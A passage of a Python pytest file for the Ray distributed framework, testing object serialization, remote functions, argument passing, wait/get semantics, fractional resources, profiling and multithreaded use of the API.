        assert_equal(obj, ray.get(ray.put(obj)))

    # Test StringIO serialization
    s = io.StringIO(u"Hello, world!\n")
    s.seek(0)
    line = s.readline()
    s.seek(0)
    assert ray.get(ray.put(s)).readline() == line
def test_nested_functions(ray_start_regular):
    """Remote functions may reference names defined after them and may
    recurse, both directly and mutually."""
    # Make sure that remote functions can use other values that are defined
    # after the remote function but before the first function invocation.
    @ray.remote
    def f():
        return g(), ray.get(h.remote())

    def g():
        return 1

    @ray.remote
    def h():
        return 2

    assert ray.get(f.remote()) == (1, 2)

    # Test a remote function that recursively calls itself.

    @ray.remote
    def factorial(n):
        if n == 0:
            return 1
        return n * ray.get(factorial.remote(n - 1))

    assert ray.get(factorial.remote(0)) == 1
    assert ray.get(factorial.remote(1)) == 1
    assert ray.get(factorial.remote(2)) == 2
    assert ray.get(factorial.remote(3)) == 6
    assert ray.get(factorial.remote(4)) == 24
    assert ray.get(factorial.remote(5)) == 120

    # Test remote functions that recursively call each other.

    @ray.remote
    def factorial_even(n):
        assert n % 2 == 0
        if n == 0:
            return 1
        return n * ray.get(factorial_odd.remote(n - 1))

    @ray.remote
    def factorial_odd(n):
        assert n % 2 == 1
        return n * ray.get(factorial_even.remote(n - 1))

    assert ray.get(factorial_even.remote(4)) == 24
    assert ray.get(factorial_odd.remote(5)) == 120
def test_ray_recursive_objects(ray_start_regular):
    """Self-referential objects must serialize under the new serializer and
    raise a serialization error under the old one."""
    class ClassA(object):
        pass

    # Make a list that contains itself.
    lst = []
    lst.append(lst)

    # Make an object that contains itself as a field.
    a1 = ClassA()
    a1.field = a1

    # Make two objects that contain each other as fields.
    a2 = ClassA()
    a3 = ClassA()
    a2.field = a3
    a3.field = a2

    # Make a dictionary that contains itself.
    d1 = {}
    d1["key"] = d1

    # Create a list of recursive objects.
    recursive_objects = [lst, a1, a2, a3, d1]

    if ray.worker.USE_NEW_SERIALIZER:
        # Serialize the recursive objects.
        for obj in recursive_objects:
            ray.put(obj)
    else:
        # Check that exceptions are thrown when we serialize the recursive
        # objects.
        for obj in recursive_objects:
            with pytest.raises(Exception):
                ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start_regular):
    """Functions, lambdas, sets and type objects can be passed as task
    arguments without any explicit registration."""
    @ray.remote
    def f(x):
        return x

    # Test passing lambdas.

    def temp():
        return 1

    assert ray.get(f.remote(temp))() == 1
    assert ray.get(f.remote(lambda x: x + 1))(3) == 4

    # Test sets.
    assert ray.get(f.remote(set())) == set()
    s = {1, (1, 2, "hi")}
    assert ray.get(f.remote(s)) == s

    # Test types.
    assert ray.get(f.remote(int)) == int
    assert ray.get(f.remote(float)) == float
    assert ray.get(f.remote(str)) == str

    class Foo(object):
        def __init__(self):
            pass

    # Make sure that we can put and get a custom type. Note that the result
    # won't be "equal" to Foo.
    ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start_regular):
    """An object holding an ObjectID and referenced by its own method closure
    must still be puttable."""
    # This test is here to prevent a regression of
    # https://github.com/ray-project/ray/issues/1317.

    class Foo(object):
        def __init__(self):
            self.val = ray.put(0)

        def method(self):
            # Referencing the outer `f` makes the method closure capture the
            # instance (and thus its ObjectID) when serialized.
            f

    f = Foo()
    ray.put(f)
def test_put_get(shutdown_only):
    """Values of several families (large ints, floats, strings, lists) must
    survive a ray.put/ray.get round-trip unchanged.

    Refactored: the original repeated the identical put/get loop four times,
    differing only in how the value was built; the value builders are now
    data-driven while the checked values stay exactly the same.
    """
    ray.init(num_cpus=0)

    value_factories = [
        lambda i: i * 10**6,        # large integers
        lambda i: i * 10**6 * 1.0,  # large floats
        lambda i: "h" * i,          # strings of increasing length
        lambda i: [1] * i,          # lists of increasing length
    ]
    for make_value in value_factories:
        for i in range(100):
            value_before = make_value(i)
            objectid = ray.put(value_before)
            value_after = ray.get(objectid)
            assert value_before == value_after
def test_custom_serializers(ray_start_regular):
    """Custom (de)serializers registered on the driver must apply both to
    put/get round-trips and to values returned from workers."""
    class Foo(object):
        def __init__(self):
            self.x = 3

    def custom_serializer(obj):
        return 3, "string1", type(obj).__name__

    def custom_deserializer(serialized_obj):
        return serialized_obj, "string2"

    ray.register_custom_serializer(
        Foo, serializer=custom_serializer, deserializer=custom_deserializer)

    assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")

    class Bar(object):
        def __init__(self):
            self.x = 3

    ray.register_custom_serializer(
        Bar, serializer=custom_serializer, deserializer=custom_deserializer)

    @ray.remote
    def f():
        return Bar()

    assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start_regular):
    """A third-party model object with no registered serializer must go
    through the fallback path and come back with identical parameters."""
    pytest.importorskip("catboost")
    # This test will only run when "catboost" is installed.
    from catboost import CatBoostClassifier

    model = CatBoostClassifier(
        iterations=2,
        depth=2,
        learning_rate=1,
        loss_function="Logloss",
        logging_level="Verbose")
    reconstructed_model = ray.get(ray.put(model))
    assert set(model.get_params().items()) == set(
        reconstructed_model.get_params().items())
def test_register_class(ray_start_2_cpus):
    """Custom classes — including several same-name classes defined in order —
    must (de)serialize correctly as put values, task arguments and returns.
    The definition order of the Class0 variants is what is under test."""
    # Check that putting an object of a class that has not been registered
    # throws an exception.
    class TempClass(object):
        pass

    ray.get(ray.put(TempClass()))

    # Test passing custom classes into remote functions from the driver.
    @ray.remote
    def f(x):
        return x

    class Foo(object):
        def __init__(self, value=0):
            self.value = value

        def __hash__(self):
            return hash(self.value)

        def __eq__(self, other):
            return other.value == self.value

    foo = ray.get(f.remote(Foo(7)))
    assert foo == Foo(7)

    regex = re.compile(r"\d+\.\d*")
    new_regex = ray.get(f.remote(regex))
    # This seems to fail on the system Python 3 that comes with
    # Ubuntu, so it is commented out for now:
    # assert regex == new_regex
    # Instead, we do this:
    assert regex.pattern == new_regex.pattern

    class TempClass1(object):
        def __init__(self):
            self.value = 1

    # Test returning custom classes created on workers.
    @ray.remote
    def g():
        class TempClass2(object):
            def __init__(self):
                self.value = 2

        return TempClass1(), TempClass2()

    object_1, object_2 = ray.get(g.remote())
    assert object_1.value == 1
    assert object_2.value == 2

    # Test exporting custom class definitions from one worker to another
    # when the worker is blocked in a get.
    class NewTempClass(object):
        def __init__(self, value):
            self.value = value

    @ray.remote
    def h1(x):
        return NewTempClass(x)

    @ray.remote
    def h2(x):
        return ray.get(h1.remote(x))

    assert ray.get(h2.remote(10)).value == 10

    # Test registering multiple classes with the same name.
    @ray.remote(num_return_vals=3)
    def j():
        class Class0(object):
            def method0(self):
                pass

        c0 = Class0()

        class Class0(object):
            def method1(self):
                pass

        c1 = Class0()

        class Class0(object):
            def method2(self):
                pass

        c2 = Class0()
        return c0, c1, c2

    results = []
    for _ in range(5):
        results += j.remote()
    for i in range(len(results) // 3):
        c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])

        c0.method0()
        c1.method1()
        c2.method2()

        # Each instance must only carry the method of its own Class0 variant.
        assert not hasattr(c0, "method1")
        assert not hasattr(c0, "method2")
        assert not hasattr(c1, "method0")
        assert not hasattr(c1, "method2")
        assert not hasattr(c2, "method0")
        assert not hasattr(c2, "method1")

    @ray.remote
    def k():
        class Class0(object):
            def method0(self):
                pass

        c0 = Class0()

        class Class0(object):
            def method1(self):
                pass

        c1 = Class0()

        class Class0(object):
            def method2(self):
                pass

        c2 = Class0()
        return c0, c1, c2

    results = ray.get([k.remote() for _ in range(5)])
    for c0, c1, c2 in results:
        c0.method0()
        c1.method1()
        c2.method2()

        assert not hasattr(c0, "method1")
        assert not hasattr(c0, "method2")
        assert not hasattr(c1, "method0")
        assert not hasattr(c1, "method2")
        assert not hasattr(c2, "method0")
        assert not hasattr(c2, "method1")
def test_keyword_args(ray_start_regular):
    """Positional/keyword argument binding for remote calls must match normal
    Python call semantics, including the error cases."""
    @ray.remote
    def keyword_fct1(a, b="hello"):
        return "{} {}".format(a, b)

    @ray.remote
    def keyword_fct2(a="hello", b="world"):
        return "{} {}".format(a, b)

    @ray.remote
    def keyword_fct3(a, b, c="hello", d="world"):
        return "{} {} {} {}".format(a, b, c, d)

    x = keyword_fct1.remote(1)
    assert ray.get(x) == "1 hello"
    x = keyword_fct1.remote(1, "hi")
    assert ray.get(x) == "1 hi"
    x = keyword_fct1.remote(1, b="world")
    assert ray.get(x) == "1 world"
    x = keyword_fct1.remote(a=1, b="world")
    assert ray.get(x) == "1 world"

    x = keyword_fct2.remote(a="w", b="hi")
    assert ray.get(x) == "w hi"
    x = keyword_fct2.remote(b="hi", a="w")
    assert ray.get(x) == "w hi"
    x = keyword_fct2.remote(a="w")
    assert ray.get(x) == "w world"
    x = keyword_fct2.remote(b="hi")
    assert ray.get(x) == "hello hi"
    x = keyword_fct2.remote("w")
    assert ray.get(x) == "w world"
    x = keyword_fct2.remote("w", "hi")
    assert ray.get(x) == "w hi"

    x = keyword_fct3.remote(0, 1, c="w", d="hi")
    assert ray.get(x) == "0 1 w hi"
    x = keyword_fct3.remote(0, b=1, c="w", d="hi")
    assert ray.get(x) == "0 1 w hi"
    x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
    assert ray.get(x) == "0 1 w hi"
    x = keyword_fct3.remote(0, 1, d="hi", c="w")
    assert ray.get(x) == "0 1 w hi"
    x = keyword_fct3.remote(0, 1, c="w")
    assert ray.get(x) == "0 1 w world"
    x = keyword_fct3.remote(0, 1, d="hi")
    assert ray.get(x) == "0 1 hello hi"
    x = keyword_fct3.remote(0, 1)
    assert ray.get(x) == "0 1 hello world"
    x = keyword_fct3.remote(a=0, b=1)
    assert ray.get(x) == "0 1 hello world"

    # Check that we cannot pass invalid keyword arguments to functions.
    @ray.remote
    def f1():
        return

    @ray.remote
    def f2(x, y=0, z=0):
        return

    # Make sure we get an exception if too many arguments are passed in.
    with pytest.raises(Exception):
        f1.remote(3)

    with pytest.raises(Exception):
        f1.remote(x=3)

    with pytest.raises(Exception):
        f2.remote(0, w=0)

    with pytest.raises(Exception):
        f2.remote(3, x=3)

    # Make sure we get an exception if too many arguments are passed in.
    with pytest.raises(Exception):
        f2.remote(1, 2, 3, 4)

    @ray.remote
    def f3(x):
        return x

    assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
    """Remote functions with *args must work; **kwargs-only functions were
    historically rejected at decoration time (the try/except records that)."""
    @ray.remote
    def varargs_fct1(*a):
        return " ".join(map(str, a))

    @ray.remote
    def varargs_fct2(a, *b):
        return " ".join(map(str, b))

    try:

        @ray.remote
        def kwargs_throw_exception(**c):
            return ()

        kwargs_exception_thrown = False
    except Exception:
        kwargs_exception_thrown = True

    ray.init(num_cpus=1)

    x = varargs_fct1.remote(0, 1, 2)
    assert ray.get(x) == "0 1 2"
    x = varargs_fct2.remote(0, 1, 2)
    assert ray.get(x) == "1 2"

    assert kwargs_exception_thrown

    @ray.remote
    def f1(*args):
        return args

    @ray.remote
    def f2(x, y, *args):
        return x, y, args

    assert ray.get(f1.remote()) == ()
    assert ray.get(f1.remote(1)) == (1, )
    assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
    with pytest.raises(Exception):
        f2.remote()
    with pytest.raises(Exception):
        f2.remote(1)
    assert ray.get(f2.remote(1, 2)) == (1, 2, ())
    assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
    assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
    # NOTE(review): leftover unittest-style method stranded at module level —
    # it takes `self` and calls self.ray_start(), which is not defined here;
    # presumably orphaned by a class-to-pytest port. Confirm and remove or
    # convert to a fixture-based test.
    @ray.remote
    def no_op():
        pass

    self.ray_start()

    ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
    """Remote functions can be defined and redefined in the driver, close over
    plain data and modules, and call other remote functions. The redefinition
    loop tolerates workers briefly using the old definition."""
    ray.init(num_cpus=3)

    # Test that we can define a remote function in the shell.
    @ray.remote
    def f(x):
        return x + 1

    assert ray.get(f.remote(0)) == 1

    # Test that we can redefine the remote function.
    @ray.remote
    def f(x):
        return x + 10

    while True:
        val = ray.get(f.remote(0))
        assert val in [1, 10]
        if val == 10:
            break
        else:
            logger.info("Still using old definition of f, trying again.")

    # Test that we can close over plain old data.
    data = [
        np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
            "a": np.zeros(3)
        }
    ]

    @ray.remote
    def g():
        return data

    ray.get(g.remote())

    # Test that we can close over modules.
    @ray.remote
    def h():
        return np.zeros([3, 5])

    assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))

    @ray.remote
    def j():
        return time.time()

    ray.get(j.remote())

    # Test that we can define remote functions that call other remote
    # functions.
    @ray.remote
    def k(x):
        return x + 1

    @ray.remote
    def k2(x):
        return ray.get(k.remote(x))

    @ray.remote
    def m(x):
        return ray.get(k2.remote(x))

    assert ray.get(k.remote(1)) == 2
    assert ray.get(k2.remote(1)) == 2
    assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
    """_remote() supports explicit args/kwargs, resources, and num_return_vals."""
    ray.init(num_cpus=2, num_gpus=1, resources={"Custom": 1})

    @ray.remote
    def f(n):
        return list(range(n))

    @ray.remote
    def g():
        return ray.get_gpu_ids()

    # With zero return values, _remote returns None rather than IDs.
    assert f._remote([0], num_return_vals=0) is None
    id1 = f._remote(args=[1], num_return_vals=1)
    assert ray.get(id1) == [0]
    id1, id2 = f._remote(args=[2], num_return_vals=2)
    assert ray.get([id1, id2]) == [0, 1]
    id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
    assert ray.get([id1, id2, id3]) == [0, 1, 2]
    assert ray.get(
        g._remote(args=[], num_cpus=1, num_gpus=1,
                  resources={"Custom": 1})) == [0]
    # A task requiring a nonexistent resource should never become ready.
    infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
    assert ray.get(g._remote()) == []
    ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
    assert len(ready_ids) == 0
    assert len(remaining_ids) == 1

    @ray.remote
    class Actor(object):
        def __init__(self, x, y=0):
            self.x = x
            self.y = y

        def method(self, a, b=0):
            return self.x, self.y, a, b

        def gpu_ids(self):
            return ray.get_gpu_ids()

    @ray.remote
    class Actor2(object):
        def __init__(self):
            pass

        def method(self):
            pass

    # Actors can also be created and invoked through _remote().
    a = Actor._remote(
        args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})

    a2 = Actor2._remote()
    ray.get(a2.method._remote())

    id1, id2, id3, id4 = a.method._remote(
        args=["test"], kwargs={"b": 2}, num_return_vals=4)
    assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_many_fractional_resources(shutdown_only):
    """Fractional CPU/GPU/custom resource requests are granted exactly.

    Submits 500 tasks with random fractional requirements and checks that
    each worker sees exactly the resources requested, then polls until the
    cluster's available resources return to their initial values.
    """
    ray.init(num_cpus=2, num_gpus=2, resources={"Custom": 2})

    @ray.remote
    def g():
        return 1

    @ray.remote
    def f(block, accepted_resources):
        # Compare the resources actually assigned to this worker against
        # what the caller requested.
        true_resources = {
            resource: value[0][1]
            for resource, value in ray.get_resource_ids().items()
        }
        if block:
            ray.get(g.remote())
        return true_resources == accepted_resources

    # Check that the resources are assigned correctly.
    result_ids = []
    for rand1, rand2, rand3 in np.random.uniform(size=(100, 3)):
        # Ray truncates fractional resources to 4 decimal places, so the
        # expected values are truncated the same way.
        resource_set = {"CPU": int(rand1 * 10000) / 10000}
        result_ids.append(f._remote([False, resource_set], num_cpus=rand1))

        resource_set = {"CPU": 1, "GPU": int(rand1 * 10000) / 10000}
        result_ids.append(f._remote([False, resource_set], num_gpus=rand1))

        resource_set = {"CPU": 1, "Custom": int(rand1 * 10000) / 10000}
        result_ids.append(
            f._remote([False, resource_set], resources={"Custom": rand1}))

        resource_set = {
            "CPU": int(rand1 * 10000) / 10000,
            "GPU": int(rand2 * 10000) / 10000,
            "Custom": int(rand3 * 10000) / 10000
        }
        result_ids.append(
            f._remote(
                [False, resource_set],
                num_cpus=rand1,
                num_gpus=rand2,
                resources={"Custom": rand3}))
        result_ids.append(
            f._remote(
                [True, resource_set],
                num_cpus=rand1,
                num_gpus=rand2,
                resources={"Custom": rand3}))

    assert all(ray.get(result_ids))

    # Check that the available resources at the end are the same as the
    # beginning.
    stop_time = time.time() + 10
    correct_available_resources = False
    while time.time() < stop_time:
        if (ray.available_resources()["CPU"] == 2.0
                and ray.available_resources()["GPU"] == 2.0
                and ray.available_resources()["Custom"] == 2.0):
            correct_available_resources = True
            break
        # BUG FIX: sleep between polls instead of busy-spinning; the spin
        # itself consumed a CPU and could delay the very resource release
        # this loop is waiting to observe.
        time.sleep(0.1)
    if not correct_available_resources:
        assert False, "Did not get correct available resources."
def test_get_multiple(ray_start_regular):
    """Getting a list of IDs, including duplicates, returns matching values."""
    refs = [ray.put(value) for value in range(10)]
    assert ray.get(refs) == list(range(10))

    # Sample indices with repetition, then duplicate the sample itself so
    # the same ObjectID appears multiple times in one get() call.
    picked = list(np.random.choice(range(10), 5))
    picked = picked + picked
    fetched = ray.get([refs[index] for index in picked])
    assert fetched == picked
def test_get_multiple_experimental(ray_start_regular):
    """ray.experimental.get accepts tuples and numpy arrays of object IDs."""
    refs = [ray.put(value) for value in range(10)]
    expected = list(range(10))

    assert ray.experimental.get(tuple(refs)) == expected
    assert ray.experimental.get(np.array(refs)) == expected
def test_get_dict(ray_start_regular):
    """ray.experimental.get on a dict resolves IDs and passes plain values through."""
    mixed = {}
    for value in range(10):
        # First half of the entries are object IDs, second half plain ints.
        mixed[str(value)] = ray.put(value) if value < 5 else value

    assert ray.experimental.get(mixed) == {
        str(value): value
        for value in range(10)
    }
def test_wait(ray_start_regular):
    """Exercise ray.wait: readiness, num_returns, timeouts, and bad input."""

    @ray.remote
    def f(delay):
        time.sleep(delay)
        return 1

    objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
    ready_ids, remaining_ids = ray.wait(objectids)
    # By default wait returns as soon as a single object is ready.
    assert len(ready_ids) == 1
    assert len(remaining_ids) == 3
    ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
    assert set(ready_ids) == set(objectids)
    assert remaining_ids == []

    objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
    start_time = time.time()
    # With a timeout, wait returns early with whatever is ready by then.
    ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
    assert time.time() - start_time < 2
    assert len(ready_ids) == 3
    assert len(remaining_ids) == 1
    ray.wait(objectids)
    objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
    start_time = time.time()
    ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
    assert time.time() - start_time < 5
    assert len(ready_ids) == 1
    assert len(remaining_ids) == 3

    # Verify that calling wait with duplicate object IDs throws an
    # exception.
    x = ray.put(1)
    with pytest.raises(Exception):
        ray.wait([x, x])

    # Make sure it is possible to call wait with an empty list.
    ready_ids, remaining_ids = ray.wait([])
    assert ready_ids == []
    assert remaining_ids == []

    # Test semantics of num_returns with no timeout.
    oids = [ray.put(i) for i in range(10)]
    (found, rest) = ray.wait(oids, num_returns=2)
    assert len(found) == 2
    assert len(rest) == 8

    # Verify that incorrect usage raises a TypeError.
    x = ray.put(1)
    with pytest.raises(TypeError):
        ray.wait(x)
    with pytest.raises(TypeError):
        ray.wait(1)
    with pytest.raises(TypeError):
        ray.wait([1])
def test_wait_iterables(ray_start_regular):
    """ray.experimental.wait accepts non-list iterables (tuple, ndarray)."""

    @ray.remote
    def f(delay):
        time.sleep(delay)
        return 1

    as_tuple = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
    done, pending = ray.experimental.wait(as_tuple)
    assert len(done) == 1
    assert len(pending) == 3

    as_array = np.array(
        [f.remote(1.0),
         f.remote(0.5),
         f.remote(0.5),
         f.remote(0.5)])
    done, pending = ray.experimental.wait(as_array)
    assert len(done) == 1
    assert len(pending) == 3
def test_multiple_waits_and_gets(shutdown_only):
    """Concurrent wait/get requests on the same object ID all complete."""
    # It is important to use three workers here, so that the three tasks
    # launched in this experiment can run at the same time.
    ray.init(num_cpus=3)

    @ray.remote
    def f(delay):
        time.sleep(delay)
        return 1

    @ray.remote
    def g(l):
        # The argument l should be a list containing one object ID.
        ray.wait([l[0]])

    @ray.remote
    def h(l):
        # The argument l should be a list containing one object ID.
        ray.get(l[0])

    # Make sure that multiple wait requests involving the same object ID
    # all return.
    x = f.remote(1)
    ray.get([g.remote([x]), g.remote([x])])

    # Make sure that multiple get requests involving the same object ID all
    # return.
    x = f.remote(1)
    ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
    """Functions registered before ray.init are cached and run on all workers.

    Each registered function appends a marker to sys.path; workers must
    observe the markers in registration order, including multiple
    registrations under the same local name `f`.
    """
    # Test that we export functions to run on all workers before the driver
    # is connected.
    def f(worker_info):
        sys.path.append(1)

    ray.worker.global_worker.run_function_on_all_workers(f)

    def f(worker_info):
        sys.path.append(2)

    ray.worker.global_worker.run_function_on_all_workers(f)

    def g(worker_info):
        sys.path.append(3)

    ray.worker.global_worker.run_function_on_all_workers(g)

    def f(worker_info):
        sys.path.append(4)

    ray.worker.global_worker.run_function_on_all_workers(f)

    ray.init(num_cpus=1)

    @ray.remote
    def get_state():
        # Give the cached functions time to run on this worker first.
        time.sleep(1)
        return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]

    res1 = get_state.remote()
    res2 = get_state.remote()
    assert ray.get(res1) == (1, 2, 3, 4)
    assert ray.get(res2) == (1, 2, 3, 4)

    # Clean up the path on the workers.
    def f(worker_info):
        sys.path.pop()
        sys.path.pop()
        sys.path.pop()
        sys.path.pop()

    ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
    """run_function_on_all_workers applies (and can undo) worker-wide setup."""

    def f(worker_info):
        sys.path.append("fake_directory")

    ray.worker.global_worker.run_function_on_all_workers(f)

    @ray.remote
    def get_path1():
        return sys.path

    assert "fake_directory" == ray.get(get_path1.remote())[-1]

    # Undo the modification on every worker.
    def f(worker_info):
        sys.path.pop(-1)

    ray.worker.global_worker.run_function_on_all_workers(f)

    # Create a second remote function to guarantee that when we call
    # get_path2.remote(), the second function to run will have been run on
    # the worker.
    @ray.remote
    def get_path2():
        return sys.path

    assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
    """All expected event categories eventually appear in ray.timeline()."""

    @ray.remote
    def f():
        with ray.profile("custom_event", extra_data={"name": "custom name"}):
            pass

    # Exercise put/submit/wait/get so their profile events get emitted.
    ray.put(1)
    object_id = f.remote()
    ray.wait([object_id])
    ray.get(object_id)

    # Wait until all of the profiling information appears in the profile
    # table.
    timeout_seconds = 20
    start_time = time.time()
    while True:
        profile_data = ray.timeline()
        event_types = {event["cat"] for event in profile_data}
        expected_types = [
            "worker_idle",
            "task",
            "task:deserialize_arguments",
            "task:execute",
            "task:store_outputs",
            "wait_for_function",
            "ray.get",
            "ray.put",
            "ray.wait",
            "submit_task",
            "fetch_and_run_function",
            "register_remote_function",
            "custom_event",  # This is the custom one from ray.profile.
        ]

        if all(expected_type in event_types
               for expected_type in expected_types):
            break

        if time.time() - start_time > timeout_seconds:
            raise RayTestTimeoutException(
                "Timed out while waiting for information in "
                "profile table. Missing events: {}.".format(
                    set(expected_types) - set(event_types)))

        # The profiling information only flushes once every second.
        time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
    """Tasks constrained to remote nodes finish and wait() observes them."""
    cluster = ray_start_cluster
    cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
    cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
    ray.init(address=cluster.address)

    # The custom resource forces these tasks onto the two added nodes.
    @ray.remote(resources={"RemoteResource": 1})
    def f():
        return

    # Make sure we have enough workers on the remote nodes to execute some
    # tasks.
    tasks = [f.remote() for _ in range(10)]
    start = time.time()
    ray.get(tasks)
    end = time.time()

    # Submit some more tasks that can only be executed on the remote nodes.
    tasks = [f.remote() for _ in range(10)]
    # Sleep for a bit to let the tasks finish.
    time.sleep((end - start) * 2)
    _, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
    # All remote tasks should have finished.
    assert len(unready) == 0
def test_object_transfer_dump(ray_start_cluster):
    """ray.object_transfer_timeline() records sends/receives on every node."""
    cluster = ray_start_cluster

    num_nodes = 3
    # One custom resource per node lets us pin tasks to specific nodes.
    for i in range(num_nodes):
        cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
    ray.init(address=cluster.address)

    @ray.remote
    def f(x):
        return

    # These objects will live on different nodes.
    object_ids = [
        f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
    ]

    # Broadcast each object from each machine to each other machine.
    for object_id in object_ids:
        ray.get([
            f._remote(args=[object_id], resources={str(i): 1})
            for i in range(num_nodes)
        ])

    # The profiling information only flushes once every second.
    time.sleep(1.1)

    transfer_dump = ray.object_transfer_timeline()
    # Make sure the transfer dump can be serialized with JSON.
    json.loads(json.dumps(transfer_dump))
    assert len(transfer_dump) >= num_nodes**2
    # Every node must show up both as a receiver and as a sender.
    assert len({
        event["pid"]
        for event in transfer_dump if event["name"] == "transfer_receive"
    }) == num_nodes
    assert len({
        event["pid"]
        for event in transfer_dump if event["name"] == "transfer_send"
    }) == num_nodes
def test_identical_function_names(ray_start_regular):
    """Redefining a remote function must not execute a stale definition."""
    # Define a bunch of remote functions and make sure that we don't
    # accidentally call an older version.
    num_calls = 200

    @ray.remote
    def f():
        return 1

    results1 = [f.remote() for _ in range(num_calls)]

    @ray.remote
    def f():
        return 2

    results2 = [f.remote() for _ in range(num_calls)]

    @ray.remote
    def f():
        return 3

    results3 = [f.remote() for _ in range(num_calls)]

    @ray.remote
    def f():
        return 4

    results4 = [f.remote() for _ in range(num_calls)]

    @ray.remote
    def f():
        return 5

    results5 = [f.remote() for _ in range(num_calls)]

    # Tasks submitted before each redefinition must still use the version
    # of f that was current at submission time.
    assert ray.get(results1) == num_calls * [1]
    assert ray.get(results2) == num_calls * [2]
    assert ray.get(results3) == num_calls * [3]
    assert ray.get(results4) == num_calls * [4]
    assert ray.get(results5) == num_calls * [5]

    @ray.remote
    def g():
        return 1

    @ray.remote  # noqa: F811
    def g():
        return 2

    @ray.remote  # noqa: F811
    def g():
        return 3

    @ray.remote  # noqa: F811
    def g():
        return 4

    @ray.remote  # noqa: F811
    def g():
        return 5

    # With no calls between redefinitions, only the last version runs.
    result_values = ray.get([g.remote() for _ in range(num_calls)])
    assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
    """Misusing put/get raises instead of silently succeeding."""
    oid = ray.put(1)

    # Re-putting an ObjectID is disallowed.
    with pytest.raises(Exception):
        ray.put(oid)

    # Getting a plain value that is not an ObjectID is disallowed.
    with pytest.raises(Exception):
        ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(ray_start_2_cpus):
    """Ray APIs are usable from many threads in drivers, workers, and actors.

    This test requires at least 2 CPUs to finish since the worker does not
    release resources when joining the threads.
    """

    def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
        """A helper function that runs test cases in multiple threads."""

        def wrapper():
            for _ in range(num_repeats):
                test_case()
                time.sleep(random.randint(0, 10) / 1000.0)
            return "ok"

        executor = ThreadPoolExecutor(max_workers=num_threads)
        futures = [executor.submit(wrapper) for _ in range(num_threads)]
        for future in futures:
            assert future.result() == "ok"

    @ray.remote
    def echo(value, delay_ms=0):
        if delay_ms > 0:
            time.sleep(delay_ms / 1000.0)
        return value

    @ray.remote
    class Echo(object):
        def echo(self, value):
            return value

    def test_api_in_multi_threads():
        """Test using Ray api in multiple threads."""

        # Test calling remote functions in multiple threads.
        def test_remote_call():
            value = random.randint(0, 1000000)
            result = ray.get(echo.remote(value))
            assert value == result

        run_test_in_multi_threads(test_remote_call)

        # Test multiple threads calling one actor.
        actor = Echo.remote()

        def test_call_actor():
            value = random.randint(0, 1000000)
            result = ray.get(actor.echo.remote(value))
            assert value == result

        run_test_in_multi_threads(test_call_actor)

        # Test put and get.
        def test_put_and_get():
            value = random.randint(0, 1000000)
            result = ray.get(ray.put(value))
            assert value == result

        run_test_in_multi_threads(test_put_and_get)

        # Test multiple threads waiting for objects.
        num_wait_objects = 10
        objects = [
            echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
        ]

        def test_wait():
            ready, _ = ray.wait(
                objects,
                num_returns=len(objects),
                timeout=1000.0,
            )
            assert len(ready) == num_wait_objects
            assert ray.get(ready) == list(range(num_wait_objects))

        run_test_in_multi_threads(test_wait, num_repeats=1)

    # Run tests in a driver.
    test_api_in_multi_threads()

    # Run tests in a worker.
    @ray.remote
    def run_tests_in_worker():
        test_api_in_multi_threads()
        return "ok"

    assert ray.get(run_tests_in_worker.remote()) == "ok"

    # Test actor that runs background threads.
    @ray.remote
    class MultithreadedActor(object):
        def __init__(self):
            self.lock = threading.Lock()
            self.thread_results = []

        def background_thread(self, wait_objects):
            try:
                # Test wait
                ready, _ = ray.wait(
                    wait_objects,
                    num_returns=len(wait_objects),
                    timeout=1000.0,
                )
                assert len(ready) == len(wait_objects)
                for _ in range(20):
                    num = 10
                    # Test remote call
                    results = [echo.remote(i) for i in range(num)]
                    assert ray.get(results) == list(range(num))

                    # Test put and get
                    objects = [ray.put(i) for i in range(num)]
                    assert ray.get(objects) == list(range(num))

